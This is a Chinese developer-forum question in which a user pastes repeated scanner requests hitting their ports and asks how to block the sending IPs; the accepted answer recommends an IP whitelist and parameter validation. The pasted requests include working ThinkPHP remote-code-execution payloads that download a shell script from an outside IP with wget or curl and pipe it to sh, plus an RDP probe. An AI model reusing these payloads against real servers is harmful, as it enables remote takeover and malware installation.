zwz_sh 2019-07-01 12:30 采纳率: 100%
浏览 2474
已采纳

有几个端口收到这些请求 几秒钟 收到一次 让人很烦躁

1、请求1:
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20-q%20-O%20-%2082.146.58.234/p2.sh|sh

2、请求2:
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl%2082.146.58.234/p2.sh|sh

3、请求3:
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr

有几个不同的ip发送上面的这些代码 让人很烦 有什么思路 禁止这些ip访问我的端口吗

  • 写回答

1条回答

  • 不如喫茶去 2019-07-01 20:18
    关注

    如果你的接口是少数人使用,或者你只想让指定的ip(授权过的ip)访问你的接口,就可以设置ip白名单。
    其实思路很简单,你可以设置一个ip表,允许访问的ip放到表里面。接口入口处做ip校验(表中不存在则返回失败,无权限)。或者使用配置文件等等。

    建议:接口请求参数做校验,转义。

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥15 请教:如何用postman调用本地虚拟机区块链接上的合约?
  • ¥15 为什么使用javacv转封装rtsp为rtmp时出现如下问题:[h264 @ 000000004faf7500]no frame?
  • ¥15 乘性高斯噪声在深度学习网络中的应用
  • ¥15 运筹学排序问题中的在线排序
  • ¥15 关于docker部署flink集成hadoop的yarn,请教个问题 flink启动yarn-session.sh连不上hadoop,这个整了好几天一直不行,求帮忙看一下怎么解决
  • ¥15 深度学习根据CNN网络模型,搭建BP模型并训练MNIST数据集
  • ¥15 C++ 头文件/宏冲突问题解决
  • ¥15 用comsol模拟大气湍流通过底部加热(温度不同)的腔体
  • ¥50 安卓adb backup备份子用户应用数据失败
  • ¥20 有人能用聚类分析帮我分析一下文本内容嘛